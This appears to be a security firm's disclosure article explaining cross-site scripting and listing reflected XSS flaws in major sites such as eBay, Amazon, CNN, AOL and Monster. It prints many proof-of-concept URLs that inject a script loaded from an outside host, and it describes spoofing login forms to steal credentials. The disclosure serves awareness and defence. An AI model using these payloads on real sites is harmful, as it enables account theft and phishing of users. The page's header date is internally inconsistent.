Search | Research | Contact Us Tuesday February 27, 2022
Languages
Most Viewed Items
  1 PHPXMLRPC Library Remote Code Execution
  2 Multiple Invision Power Board Vulnerabilities
  3 XOOPS 2.0.11 && Earlier Multiple Vulnerabilities
  4 Mambo Multiple Vulnerabilities
  5 PEAR XML_RPC Library Remote Code Execution
  6 eBay And Amazon Still Vulnerable
  7 Woltlab Burning Board SQL Injection Vulnerability
  8 When Small Mistakes Can Cause Big Problems
  9 WordPress 1.5.1.2 And Earlier Multiple Vulnerabilities
10 MySQL Eventum Multiple Vulnerabilities
Need Secure Code?
Quick Search
You can use the form below to search our site. Just enter the keywords to search.
Home Services Archives Research Downloads Contact
When Small Mistakes Can Cause Big Problems
September 18, 2021


What do popular websites such as Amazon, eBay, half.com, CareerBuilder, AOL, CNN, MTV, VH1, HBO and many others have in common? Well, aside from being amongst the most popular places on the internet they also share a common flaw; Cross Site Scripting.


What Is "Cross Site Scripting"?
Cross Site Scripting occurs mostly from a lack of input validation within a vulnerable web application. This can allow for an attacker to send a victim a malicious link which will then render possible malicious code in the context of the victim’s browser. In another words Person A can tell Person B "Hey, have a look at this cool website!" Person B has probably heard all about recent virii and the like, and knows not to open attachments from unknown sources, keep an up to date antivirus program, and make sure their operating system has all of the required security patches. Person B probably does not think much about visiting this website; except when he does Person A's malicious code is executed. This is definitely not a good scenario, and has been officially recognized since February 2002 by such various agencies as the CERT Coordination Center, DoD-CERT, DoD Joint Task Force for Computer Network Defense, the Federal Computer Incident Response Capability, and the National Infrastructure Protection Center as a very real attack vector.


The Risks Of Cross Site Scripting
Let’s assume that in the example given earlier between Person A and Person B, that the website used to render the malicious code was some less trusted website such as a blog, or personal site. This probably poses a smaller risk because not only would any smart user’s suspicions be higher, but also any data that could be stolen is probably insignificant compared to financial data, and sensitive personal information. Now what if the same scenario presented itself on some major eCommerce website such as Amazon or eBay? The stakes are much higher for a few reasons. One, being that the data stored on the website is much more sensitive (financial and personal information) and greatly desired by an attacker, and the other being that the site is much more trusted because of its size and reputation. The problem with the second scenario is that it is not theoretical, but real.


The Problem Is Real!
GulfTech Security Research was able to find in the past few weeks, cross site scripting issues that existed on eBay, Amazon, Half.com, HBO, CareerBuilder, AOL, CNN, MTV, and many others. The cross site scripting issues on these websites could allow an attacker to take control of arbitrary accounts, or steal sensitive info. Websites such as eBay, Amazon, and Half.com (for example) have fairly good Security when it comes to protecting their user’s accounts, but even they are vulnerable to data theft via these vulnerabilities. For example, it may be somewhat useless to steal a victim’s cookie, or try and render malicious code, or force command execution on a website with tight account security. So instead of relying on some great technological advantage an attacker could simply attempt to take advantage of the human element and have the victim simply give the attacker their account information. This can be done by using the cross site scripting vulnerabilities to temporarily deface a website. So, instead of rendering malicious code, or trying to steal a user’s cookie, the attacker can link to an offsite JavaScript, and have it render a login form using the vulnerable website’s own HTML and Style Sheet so that it looks nearly identical to the legitimate login form. Of course when a victim logs in to this form it actually just steals their login credentials. The attacker could also use the same methods of temporarily defacing the website to show someone a fictitious news story on a major news website.


How To Protect Yourself
The only foolproof way to protect yourself from these kinds of attacks is to turn off script support in your browser. This however greatly reduces the functionality of your browser in most cases. Other measures you can take to protect yourself are to examine links before you follow them. If you see something funny in the URL such an unusual amount of hex characters, markup language, or script, then you probably do not want to follow the link. It is also best to not check the “remember my password� option that a lot of sites make available. These steps will help you keep safe, but the majority of this problem comes from unsafe programming practices, and should be eliminated by the developers before being made publicly available.


See The Problems In Action
Before showing any real world examples, it is VERY important to know that GulfTech Research and Development does not condone the use of these flaws for malicious purposes. In fact, we heavily discourage it. These examples are here for information purposes only, and to give both consumers and web developers a look at what not to do and what kind of links NOT to follow. I have made attempts to contact the affected websites before writing this article. Only a few responded, and even some of those did not get it right. CNN for example were one of the few that responded, and seemed to have fixed the problem shortly after. The problem was though, that if I entered any script in an unorthodox manner, such as spelling (sCrIPt) or tied script attributes to another tag, then the code would be executed. Now, it seems that no type of protection is there. This could allow for a malicious user to attack accounts within the cnn.com domain, spoof a login form that sends the attacker the victim's login credentials, or put up their own bogus news story and make it look flawlessly legit by viewing the outputted source code and injecting their defacement in such a manner that the flow of the code is not interrupted at all. In this example we see the GTRAD name in big letters, but we also see broken tags which make it look sloppy and suspicious, but as I said before this can be avoided.

http://search.cnn.com/pages/search/advanced.jsp?Coll=cnn_xml&QuerySubmit;=true&Page;=1&Query; Text=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E

CNN is not the only large and trusted new website affected though. Another example is ABC news. The vulnerability present in ABC news is sort of an example of what I will be talking about next.

http://infospace.abcnews.com/_1_2B4MUKW03Y7ZYZZ__info.abcnws/dog/results?otmpl=dog/ webresults.htm&qcat;=web&ran;=&qkw;=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/ foobar.js%22%3E%3C/script%3E%3C!--%3C!--

Another scenario is large domains putting their trust in someone else's code. Take for example the issue in LiveWorld products GulfTech released a few weeks ago. The vulnerabilities affected the likes of HBO, eBay, and others. The affected domains did not host the vulnerable software, LiveWorld did. The problem is that the DNS for the parent domains were still used:

http://answercenter.ebay.com/search.jsp?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff. gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--

http://groups.ebay.com/findclub!execute.jspa?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2F stuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--

http://forums.ebay.com/search.jsp?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff. gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E

http://boards.hbo.com/search!execute.jspa?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2F stuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--

What does this mean? Well, it can affect both the human element, and the technical element. On one hand a user could possible steal information associated with the parent domains such as cookie information etc., and in cases where that was not a preferred avenue of attacking a victim a malicious user may temporarily deface a webpage with a spoofed login form. Because the user trusts the domain, it makes the second example more easily executed. LiveWorld fixed these issues after I made them public, but never did respond when I informed them of the issues in advance of the public release.

So, what could be worse than what we have already talked about? How about an attacker gaining access to sensitive personal and financial data? Well, this is a possibility, and you will soon see how. Let's think about some websites that are becoming household names when it comes to commerce, and employment. Employment websites for example usually require a good deal of personal information. Monster, and CareerBuilder are probably two of the most popular websites available for both job seekers, and employers. Unfortunately they are also vulnerable to the same cross site scripting issues as I talked about before.

http://my.monster.com/viewresume.asp?nextpage=home.asp%22%3E%3Cscript%20src=%22http:// stuff.gulftech.org/foobar.js%22%3E%3C/script%3E&resumeid;=RESUMEIDHERE&original;=current

http://www.careerbuilder.com/share/Login.asp?sc_cmp2=JS_HP1_Nav_MyCB%22%20//--%3E%3C/ script%3E%3C/script%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/ script%3E%3Cscript%3E%3C!--%20var%20blah=%22

Seeing as how identity theft is on the rise, vulnerabilities on major employment websites such as these could be potentially devastating if successfully exploited. Now let’s talk about eCommerce. Earlier I pointed out ways eBay users could be attacked, so I will not talk about eBay again here even though it definitely falls into this category, but I will talk about eBay's half.com as well as Amazon and others. These are the same types of attacks, and can potentially lead to the same consequences.

http://half.ebay.com/search/search.jsp?nthTime=&product;=all&keyword;=%22%3E%3Cscript%20src= %22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E&x;=0&y;=0

http://www.amazon.com/exec/obidos/tg/detail/-/0802132952/%22%3E%3E%3Cscript%20src=http:// stuff.gulftech.org/foobar.js%3E%3C/script%3E/ref=pd_sim_books_3/104-8941545-9279926/103- 1795435-7689412?v=glance&s;=books

Both Half.com and Amazon do a fairly good job of protecting user's accounts. Stealing cookies may be trivial, but spoofed login forms and even performing some forced command execution is definitely possible. Sure, these are all interesting, and for some of us equally as worrisome, but it seems a bit humorous when large technical entities leave themselves opened up to these same kind of attacks. Who would allow this you ask? Well, AOL, Veritas, Intel, and many others.

http://www.aol.com/support/index.adp?toc=%22%22%20//--%3E%3C/script%3E%3C/script%3E%3Cscript %20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E%3Cscript%3E%3C!--%20var%20b lah=%22

http://search.intel.com/support/search.asp?q1=%22%3E%3Ch1%3EGulfTech%20Research%20And%20 Development%3C/h1%3E%3C!--%3C!--%3C!--%3C!--%3C!--

http://forums.veritas.com/discussions/search!execute.jspa?q=%22%3E%3Cscript+src%3D%22 http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--

I hope that as a user you have a better idea of what to look out for, and know that these types of attacks are very real and can be exploited, and that a very large number of your favorite sites could be vulnerable to these attacks.

http://searchb.disney.go.com/disneySearch?col1=disney%20store%20parks%20video&qt;= %22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E

http://faq.orbitz.com/cgi-bin/orbitz.cfg/php/enduser/std_search_custom.php?p_new_search= 1&p;_search_text=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22 %3E%3C%2Fscript%3E%3C%21--%3C%21--

http://www.mtv.com/community/profiles/profile_not_found.jhtml?username=%22%3E%3Cscript %20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E

http://www.vh1.com/search/search_shows.jhtml?sorttype=by_name_asc&searchtype;=show& searchterm=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E

The best way to learn to be safe is to know the risks, and become familiar with potential attack types. I hope this article has helped with this.


Disclaimer
GulfTech Security Research has discovered all of these XSS issues independently. We are in no way affilated with any of the named companies. We greatly discourage the use of these examples for malicious porposes, and can not be held responsible for any certain individuals actions. If you would like to use any of these examples on your website, feel free to as long as you give us credit and do not use them for malicious purposes.


References
Possible Security Issues In LiveWorld Products
http://www.gulftech.org/?node=research&article;_id=00044-08232004

CERT® Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests
http://www.cert.org/advisories/CA-2000-02.html

The Cross Site Scripting FAQ
http://www.cgisecurity.com/articles/xss-faq.shtml

Preventing Cross-site Scripting Attacks
http://www.perl.com/pub/a/2002/02/20/css.html